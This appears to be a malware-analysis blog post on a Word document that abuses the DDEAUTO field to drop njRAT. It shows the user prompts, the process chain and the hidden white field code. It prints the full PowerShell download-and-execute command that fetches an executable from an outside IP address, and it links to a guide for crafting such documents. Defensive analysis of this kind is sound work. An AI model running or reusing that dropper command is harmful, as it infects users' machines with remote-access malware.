NJRAT (1.31.2020) – Malicious Document & DDEAUTO

DDEAUTO, which stands for automatic dynamic data exchange, is a feature in Microsoft Word that allows someone to pull data from one file directly into another file. It is supposed to work only within the application itself or if the two necessary applications are open.

It also has the ability to start cmd.exe. What could go wrong?

We will be working off of this document HERE. It downloads what any.run identified as njrat. That can be found HERE.


Document Behavior

Upon opening the document, we see this alert. Note how it says that the document contains links that may refer to other files. This is your clue that it is using DDEAUTO. If you choose yes, it will ‘update this document with the data from the linked files’.

njrat01.png

Clicking yes, gives us the following alert. Note, the bad things haven’t happened just yet, but if we choose yes again, bad things will start to happen. We can see the warning that the remote data is not accessible. Shall we instead start an application? Of course!

njrat02.png

We can now see what happens next. WINWORD.EXE spawns cmd.exe, which then spawns powershell.exe.

njrat03.png

What commands get executed here? Double-clicking on cmd.exe above (I was watching the processes spawn in Process Hacker) shows the following command line:

C:\Programs\Collection\MSWord\..\..\..\..\windows\system32\cmd.exe /k powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('http[:]//208[.]167[.]245[.]254/signed1.exe','1.exe');start '1.exe'

It is not that difficult to see how this command works. Cmd.exe spawns powershell.exe, which downloads an executable, renames it, and then starts it.


Where can we find it in the document?

If we have the formatting symbols and paragraph marks turned on in Word, we can see that the body is not completely blank. If we highlight those characters, we can see that there is some text in white.

njrat05.png

I will also be making the text red to make it easier to see. Right-clicking on the Russian characters, we see the option to Toggle Field Codes.

njrat06.png

Selecting that option, we see the the string pop out.

njrat07.png

Notice the carriage return symbol above. If we right-click on that and also choose Toggle Field Codes, the following appears.

njrat08.png

And the numbers above translate into { QUOTE PowerShell }

As far as creating your own document like this (for testing purposes, of course), there are many blogs/videos that show how it is done. This one seemed rather promising: https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

Thanks for reading!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s